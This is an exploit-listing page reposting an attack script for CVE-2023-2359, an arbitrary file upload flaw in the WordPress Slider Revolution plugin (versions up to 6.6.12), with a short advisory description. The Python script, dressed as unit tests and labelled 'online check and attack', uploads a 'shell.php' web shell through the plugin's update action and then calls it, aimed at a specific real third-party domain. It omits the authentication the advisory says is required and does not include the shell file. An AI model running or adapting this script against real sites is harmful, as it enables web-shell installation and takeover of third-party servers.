Advertisement






exploit Slider Revolution < = 6.6.12 - Authenticated (Administrator+) Arbitrary File Upload

CVE Category Price Severity
CVE-2023-2359 CWE-264 Unknown High
Author Risk Exploitation Type Date
Unknown Critical Remote 2023-10-29
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023100058

Below is a copy:

exploit Slider Revolution <= 6.6.12 - Authenticated (Administrator+) Arbitrary File Upload
Slider Revolution <= 6.6.12 - Authenticated (Administrator+) Arbitrary File Upload

7.2
Unrestricted Upload of File with Dangerous Type
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVECVE-2023-2359
CVSS7.2 (High)
Publicly PublishedMay 22, 2023
Last UpdatedMay 30, 2023
ResearcherMarco Frison
Description

The Slider Revolution plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in versions up to, and including, 6.6.12. This makes it possible for authenticated attackers with administrator-level attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. While the default settings allow only administrators to exploit this vulnerability, this privilege can be granted to users as low as author.







EXPLOIT :


###################################

#online check and attack
#  Revolution Slider <= 6.6.12 - Author+ Remote Code Execution

###################################

import unittest
import requests

class TestSliderRevolution(unittest.TestCase):

def test_upload_file(self):

url = "http://adroom.ir/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin"
file = open("shell.php", "rb")
data = {"update_file": file}
response = requests.post(url, files=data)
self.assertEqual(response.status_code, 200)
self.assertIn("Update in progress", response.text) 

def test_execute_code(self):

url = "http://adroom.ir/wp-content/plugins/revslider/temp/update_extract/revslider/shell.php"
response = requests.get(url)
self.assertEqual(response.status_code, 200) 
self.assertIn("Hello, world!", response.text) 

if __name__ == "__main__":
unittest.main()

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.